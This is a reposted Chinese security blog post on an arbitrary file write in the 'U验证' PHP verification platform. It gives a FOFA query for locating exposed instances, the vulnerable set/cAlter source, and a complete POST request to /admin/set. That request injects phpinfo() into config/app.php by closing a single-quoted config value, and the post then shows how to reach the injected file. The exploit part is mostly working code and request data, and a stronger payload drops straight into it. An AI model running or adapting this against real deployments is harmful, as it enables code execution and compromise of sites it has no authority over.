某U验证平台任意文件写入

admin
admin
admin
140350
文章
117
评论
2024年7月8日08:19:57评论17 views字数 2210阅读7分22秒阅读模式

FOFA语句:fid="Uym31mH5gMrsJ69I2Dp6cw==" || title="U验证系统"

进入仓库

某U验证平台任意文件写入

点击设置按钮

某U验证平台任意文件写入

拉到最下面点击保存

某U验证平台任意文件写入

抓取到的数据包如下:

某U验证平台任意文件写入

去找路由代码在:

uverif-mainuverif-mainappcontrollersadmin.php

文件的set函数

主要漏洞代码

$data = [    'WEB_URL'        => $_POST['web_url'],    'APP_PAGE_ENUMS' => (int)$_POST['app_page_enums'],    'APP_ADM_LOG'    => $_POST['app_adm_log'],    'APP_USER_LOG'   => $_POST['app_user_log'],    'API_RUN_COST'   => $_POST['api_run_cost'],    'API_OUT_TYPE'   => $_POST['api_out_type'],    'API_WHITE'      => $_POST['api_white'],    'USER_UPFILE_SIZE'   => (int)$_POST['user_upfile_size'],];$res = cAlter('app',$data);

进入cAlter函数查看内容

function cAlter($name,$arr){    if(!file_exists(U_CONF.U_D.$name.'.php')){return false;}    $userdata = file_get_contents(U_CONF.U_D.$name.'.php');    foreach ($arr as $k => $v){       if(is_int($v)){          $userdata = preg_replace("/'{$k}'=>.*?,/", "'{$k}'=>{$v},", $userdata);       }else{          $userdata = preg_replace("/'{$k}'=>'.*?'/", "'{$k}'=>'{$v}'", $userdata);       }    }    $res = file_put_contents(U_CONF.U_D.$name.'.php', $userdata);    return $res;}

发现文件写入

写入的位置是config/app.php

某U验证平台任意文件写入

Php配置文件中是单引号 那我们就用单引号闭合 然后拼接phpinfo

最后构造数据包如下:

POST /admin/set HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.35 Safari/537.36Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateReferer: http://127.0.0.1/admin/homeContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 216Origin: http://127.0.0.1Connection: closeCookie: PHPSESSID=s80851qsrc87aksm45abl2444d; appid=1000; admcookies=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJhZG1pbjEyMyIsImlhdCI6MTcxOTIzMzE3NSwiZXhwIjoxNzE5MzE5NTc1LCJuYmYiOjE3MTkyMzMxNzUsInN1YiI6IjEyNy4wLjAuMSIsImp0aSI6IjA4MTljY2Y2ZTkzMjEzOWY1YjkzNDFhM2QyNDRmZGYwIiwiY2xhaW0iOm51bGx9.nuK71Cd2wNsyy1QRpiDHjRwL-Mza0Qauln2f1EZCi_QSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originPriority: u=1web_url=http://www.user.com/',phpinfo(),#,&app_page_enums=15&app_adm_log=on&app_user_log=on&api_white=pay&user_upfile_size=2&api_out_type=json&api_run_cost=on&sys_error=on&sys_debug=on&sys_cache=on&error_uploading=on

某U验证平台任意文件写入

查看app.php

某U验证平台任意文件写入

然后访问 http://x.x.x.x/config/app.php

某U验证平台任意文件写入

感谢关注RongRui科技,技术交流私信拉群

承接项目:软件开发、web开发、攻防演练、等保测评等

原文始发于微信公众号(RongRui安全团队):某U验证平台任意文件写入

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月8日08:19:57
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   某U验证平台任意文件写入https://cn-sec.com/archives/2928527.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息